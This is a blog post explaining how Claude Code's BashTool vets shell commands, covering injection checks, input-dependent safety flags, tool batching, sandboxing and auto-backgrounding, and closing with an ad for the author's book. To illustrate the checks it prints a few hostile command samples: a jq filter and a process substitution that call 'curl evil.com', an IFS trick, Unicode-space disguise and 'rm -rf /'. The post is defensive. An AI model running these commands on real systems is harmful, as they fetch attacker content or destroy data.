Charlie Li

23 Security Checks: How Claude Code Keeps Your Shell Commands Safe

Every time Claude Code runs a shell command on your machine, it passes through a gauntlet of 23 security checks, a sandbox decision, and a multi-layer permission system — all in milliseconds, before a single byte of output appears.

I reverse-engineered Claude Code's source (v2.1.88) to understand exactly how this works. Here's what I found.

The Problem: Unlimited Power Needs Limits

BashTool is the most powerful tool in Claude Code's arsenal. It can install packages, start servers, modify files, access the network — theoretically, it can do anything your shell can do.

That's terrifying.

So Anthropic built the most complex security system in the entire codebase around this single tool. The execution pipeline looks like this:

Command arrives from the model
         │
         ▼
   ┌──────────────┐
   │ Input         │  Format validation, timeout range check
   │ Validation    │
   └──────┬───────┘
          │
          ▼
   ┌──────────────┐
   │ 23 Security   │  Injection detection, obfuscation scanning,
   │ Checks        │  dangerous pattern recognition
   └──────┬───────┘
          │
          ▼
   ┌──────────────┐
   │ Permission    │  Allowlist? Needs classifier? User approval?
   │ System        │
   └──────┬───────┘
          │
          ▼
   ┌──────────────┐
   │ Sandbox       │  Filesystem restriction, network isolation
   │ Wrapping      │
   └──────┬───────┘
          │
          ▼
   ┌──────────────┐
   │ Execution     │  Spawned in isolated process group
   └──────────────┘

Let's unpack the interesting parts.

The 23 Security Checks

bashSecurity.ts implements a pattern-matching system that catches various classes of attacks. Here are the most interesting ones:

Unicode Disguise Attacks

# This looks like "ls -la" but the space is actually U+2000 (EN QUAD)
ls\u2000-la

Claude Code scans for Unicode whitespace characters (U+2000–U+200A, U+2028, U+2029, etc.) hiding in seemingly normal commands. A human reviewing the command in the UI might not notice the difference, but the shell does not treat these characters as word separators, so it parses the command differently from how it reads on screen.
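
A minimal sketch of that kind of scan, assuming a single regular expression over the ranges listed above. The helper name findUnicodeWhitespace and the inclusion of U+00A0 are illustrative assumptions, not the actual bashSecurity.ts code:

```typescript
// Hypothetical helper. The character class covers the ranges named in the
// article plus U+00A0 (no-break space), which is an assumption.
const UNICODE_WHITESPACE = /[\u00A0\u2000-\u200A\u2028\u2029]/;

interface WhitespaceHit {
  index: number;     // position of the first suspicious character
  codePoint: string; // formatted like "U+2000"
}

function findUnicodeWhitespace(command: string): WhitespaceHit | null {
  const match = UNICODE_WHITESPACE.exec(command);
  if (match === null) return null;
  const hex = match[0].charCodeAt(0).toString(16).toUpperCase();
  return { index: match.index, codePoint: "U+" + ("0000" + hex).slice(-4) };
}

console.log(findUnicodeWhitespace("ls\u2000-la")); // flags the EN QUAD at index 2
console.log(findUnicodeWhitespace("ls -la"));      // null: ordinary ASCII space
```

Reporting the position and code point, rather than a bare boolean, makes it possible to show the reviewer exactly which character is not what it appears to be.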

Command Substitution Injection

# Looks like a harmless jq query...
jq '.data | system("curl evil.com")'

Claude Code specifically checks for system() calls inside jq expressions, because a filter that can call system() can execute arbitrary commands.

IFS Injection

IFS=/ echo foo/bar

Changing the Internal Field Separator can make the shell reinterpret how it splits words, potentially turning benign strings into executable commands. Claude Code detects IFS modifications in unquoted regions.

Shell Metacharacter Abuse

# Brace expansion to generate unexpected arguments
echo {a,b,c}

# Process substitution
cat <(curl evil.com)

The security scanner parses quotes character by character to identify unquoted regions, then checks those regions against dangerous patterns. This is harder than it sounds — you need to correctly handle single quotes, double quotes, escaped characters, heredocs, and their interactions.
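
Here is a rough sketch of the idea: walk the command one character at a time, blank out everything that is quoted or escaped, then run pattern checks on what remains. The function names and the two patterns are assumptions for illustration. The sketch also skips heredocs and treats double-quoted text as inert, which a real scanner cannot do because the shell still expands $(...) and backticks inside double quotes.

```typescript
// Replace every quoted or backslash-escaped character with a space so that
// later pattern checks only see text the shell treats as live syntax.
// Limitations (deliberate, to keep the sketch short): heredocs are ignored,
// and double-quoted text is masked even though expansions still occur there.
function maskQuoted(command: string): string {
  let out = "";
  let quote: "'" | '"' | null = null;
  for (let i = 0; i < command.length; i++) {
    const ch = command.charAt(i);
    // Backslash escapes the next character, except inside single quotes.
    const escapes = ch === "\\" && quote !== "'" && i + 1 < command.length;
    if (escapes) {
      out += "  "; // mask the backslash and the character it escapes
      i++;
    } else if (quote === null && (ch === "'" || ch === '"')) {
      quote = ch;  // opening quote
      out += " ";
    } else if (quote !== null) {
      if (ch === quote) quote = null; // closing quote
      out += " ";
    } else {
      out += ch;   // unquoted text is kept as-is
    }
  }
  return out;
}

// Hypothetical pattern table; the real list is longer.
const DANGEROUS_UNQUOTED: { name: string; pattern: RegExp }[] = [
  { name: "process substitution", pattern: /[<>]\(/ },
  { name: "IFS assignment", pattern: /(^|[\s;&|])IFS=/ },
];

function findUnquotedPatterns(command: string): string[] {
  const visible = maskQuoted(command);
  return DANGEROUS_UNQUOTED
    .filter((entry) => entry.pattern.test(visible))
    .map((entry) => entry.name);
}

console.log(findUnquotedPatterns("cat <(curl evil.com)"));  // process substitution
console.log(findUnquotedPatterns("echo '<(just a string)'")); // nothing flagged
```

Masking with spaces instead of deleting characters keeps every index aligned with the original command, so a match position can be reported against the text the user actually sees.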

Safety Declarations Are Input-Dependent

Here's a design decision I found clever. Each tool declares its safety profile as a function of the input:

// Simplified from the actual code
isReadOnly(input) {
  // "git status" is read-only
  // "rm -rf /" is definitely not
  return isReadCommand(input.command)
}

isConcurrencySafe(input) {
  // Multiple "grep" commands can run in parallel
  // Multiple "npm install" should not
  return isSearchCommand(input.command)
}

The same BashTool has completely different safety profiles depending on what command you're running. This avoids the naive approach of marking the entire tool as "dangerous" and forcing every git status through a user approval dialog.
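
To make the idea concrete, here is a self-contained sketch of an input-dependent isReadOnly. The allowlist and the metacharacter rule are assumptions chosen for illustration; the real classification is more involved.

```typescript
interface BashInput {
  command: string;
}

// Hypothetical allowlist of commands that only read state.
const READ_ONLY_COMMANDS = ["git status", "ls", "cat", "grep"];

// Anything that can chain commands, redirect output, or trigger expansion
// disqualifies the command, so "ls; rm -rf /" is never treated as read-only.
const SHELL_METACHARACTERS = /[;&|<>`$(){}\n\\]/;

function isReadOnly(input: BashInput): boolean {
  const command = input.command.trim();
  if (SHELL_METACHARACTERS.test(command)) return false;
  return READ_ONLY_COMMANDS.some(
    (allowed) => command === allowed || command.startsWith(allowed + " ")
  );
}

console.log(isReadOnly({ command: "git status" }));   // true
console.log(isReadOnly({ command: "rm -rf /" }));     // false
console.log(isReadOnly({ command: "ls; rm -rf /" })); // false
```

The metacharacter check runs first on purpose: a prefix match alone would wave through any command that merely starts with an allowed word.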

Tool Orchestration: The Parallel vs. Serial Trade-off

When Claude Code needs to run multiple tools, it faces a classic concurrency decision. Here's the actual batching strategy from toolOrchestration.ts:

Tool calls from the model: [Grep, Grep, FileEdit, Grep, Bash]

Batched by concurrency safety:
  Batch 1: [Grep, Grep]    → Parallel  (both read-only)
  Batch 2: [FileEdit]      → Serial    (write operation)
  Batch 3: [Grep]          → Serial    (new batch after write)
  Batch 4: [Bash]          → Serial    (not concurrency-safe)

The rule: consecutive concurrency-safe tools merge into a parallel batch. A non-safe tool starts a new batch. Simple, correct, and effective.
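
The rule fits in a few lines. This sketch assumes each call already carries a concurrencySafe flag; the ToolCall and Batch types and the partitionToolCalls name are illustrative, not copied from toolOrchestration.ts:

```typescript
interface ToolCall {
  name: string;
  concurrencySafe: boolean;
}

interface Batch {
  concurrencySafe: boolean; // true: members may run in parallel
  calls: ToolCall[];
}

function partitionToolCalls(calls: ToolCall[]): Batch[] {
  const batches: Batch[] = [];
  for (const call of calls) {
    const last = batches[batches.length - 1];
    if (call.concurrencySafe && last !== undefined && last.concurrencySafe) {
      // Consecutive safe calls join the current parallel batch.
      last.calls.push(call);
    } else {
      // A non-safe call, or the first safe call after one, starts a new batch.
      batches.push({ concurrencySafe: call.concurrencySafe, calls: [call] });
    }
  }
  return batches;
}

const batches = partitionToolCalls([
  { name: "Grep", concurrencySafe: true },
  { name: "Grep", concurrencySafe: true },
  { name: "FileEdit", concurrencySafe: false },
  { name: "Grep", concurrencySafe: true },
  { name: "Bash", concurrencySafe: false },
]);
console.log(batches.map((b) => b.calls.length)); // batch sizes: 2, 1, 1, 1
```

Because batches are built in order and executed one after another, a read that follows a write always sees the write's result, even though reads within a batch run side by side.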

But it gets better. Claude Code has a streaming executor that starts running tools while the model is still generating output:

Traditional: [Model output.......done] → [Execute tools.....done]

Streaming:   [Model output....done]
                ↓Grep1  ↓Grep2  ↓Edit
              [exec]   [exec]   [wait] [exec]

This overlap between model generation and tool execution saves significant wall-clock time, especially when the model generates multiple tool calls in a single response.

The Fail-Safe Default

Every tool in Claude Code starts from a shared set of defaults, and the concurrency and read-only defaults are deliberately conservative:

const TOOL_DEFAULTS = {
  isConcurrencySafe: () => false,  // Assume NOT parallel-safe
  isReadOnly: () => false,         // Assume it WRITES data
  isDestructive: () => false,      // Assume recoverable
}

If a tool developer forgets to declare isConcurrencySafe, the system assumes it's not safe and runs it serially. Better to lose some performance than to corrupt data with unsynchronized parallel writes.
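
One way such defaults could be applied is an object spread, where anything the tool author leaves out falls back to TOOL_DEFAULTS. The buildTool helper and the types below are assumptions for illustration:

```typescript
interface ToolSafety {
  isConcurrencySafe: (input: unknown) => boolean;
  isReadOnly: (input: unknown) => boolean;
  isDestructive: (input: unknown) => boolean;
}

const TOOL_DEFAULTS: ToolSafety = {
  isConcurrencySafe: () => false,
  isReadOnly: () => false,
  isDestructive: () => false,
};

// A tool author only has to supply a name; every safety declaration is optional.
interface ToolDefinition extends Partial<ToolSafety> {
  name: string;
}

type Tool = ToolSafety & { name: string };

// Hypothetical helper: later spreads win, so explicit declarations override
// the defaults and omitted ones fall back to them.
function buildTool(definition: ToolDefinition): Tool {
  return { ...TOOL_DEFAULTS, ...definition };
}

const grep = buildTool({ name: "Grep", isConcurrencySafe: () => true, isReadOnly: () => true });
const custom = buildTool({ name: "MyTool" }); // author declared nothing

console.log(grep.isConcurrencySafe({}));   // true: explicitly declared
console.log(custom.isConcurrencySafe({})); // false: falls back to the default
```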

The Sandbox Decision

After passing all security checks, the command still might get sandboxed:

function shouldUseSandbox(command, context) {
  if (!SandboxManager.isEnabled()) return false
  if (userExplicitlyDisabled) return false
  if (isExcludedCommand(command)) return false
  return true  // Sandbox by default
}

The sandbox restricts filesystem access to the project directory and limits network permissions. It's the last line of defense.

Auto-Backgrounding: The Practical Touch

One last detail I loved: timeout handling isn't just "kill the process." If a command runs longer than expected, Claude Code auto-backgrounds it instead of killing it:

You run "npm install" → Expected: 30s → Actual: 5 minutes
Instead of killing it → Moved to background
Agent continues working → Checks results when install completes

This is the kind of design decision that separates a polished developer tool from a prototype.
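
The core of this behavior can be approximated with a race between the command and a timer. This is a sketch under assumptions: runWithAutoBackground and the Outcome type are hypothetical names, and a Promise stands in for the spawned process.

```typescript
type Outcome<T> =
  | { status: "completed"; value: T }
  | { status: "backgrounded"; pending: Promise<T> };

async function runWithAutoBackground<T>(
  task: Promise<T>,
  budgetMs: number
): Promise<Outcome<T>> {
  const timeout = new Promise<"timeout">((resolve) => {
    const timer = setTimeout(() => resolve("timeout"), budgetMs);
    // Clear the timer once the task settles so it cannot keep the process alive.
    const clear = () => clearTimeout(timer);
    task.then(clear, clear);
  });
  const completed = task.then((value) => ({ status: "completed" as const, value }));

  const winner = await Promise.race([completed, timeout]);
  if (winner === "timeout") {
    // The task is NOT cancelled; the caller keeps a handle and checks it later.
    return { status: "backgrounded", pending: task };
  }
  return winner;
}

// Usage: a slow "install" that outlives its budget keeps running in the background.
const slowInstall = new Promise<string>((resolve) =>
  setTimeout(() => resolve("installed"), 100)
);
runWithAutoBackground(slowInstall, 10).then((outcome) => {
  if (outcome.status === "backgrounded") {
    outcome.pending.then((result) => console.log("finished later:", result));
  }
});
```

The key design point is that hitting the time budget changes who is waiting, not whether the work continues. If the task fails before the budget expires, the rejection propagates to the caller as usual.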


The Bigger Picture

Claude Code's tool system has 40+ tools, each with its own safety declarations, permission checks, and execution logic. The BashTool security system is just one piece of a much larger architecture that includes:

  • Lazy tool loading via ToolSearch (40+ tools don't all load at startup)
  • File deduplication cache (18% of file reads are duplicates — all cached)
  • Context modifiers that propagate state changes between tools
  • Sub-agent tool restrictions (spawned agents can't use all parent tools)

I've documented all of this in my book "Claude Code from the Inside Out", a complete reverse-engineering of Claude Code's architecture based on v2.1.88 source analysis. Its 12 chapters cover the full architecture, from the core loop to multi-agent coordination.

📖 Read Chapter 1 free — "What Is an AI Agent? From ChatBot to Claude Code"

If you like it, the full book is available at 50% off for early readers:

📘 Claude Code from the Inside Out (English) — use code LAUNCH50 for $4.99
📕 深入浅出 Claude Code (中文) — use code LAUNCH50CN for $4.99

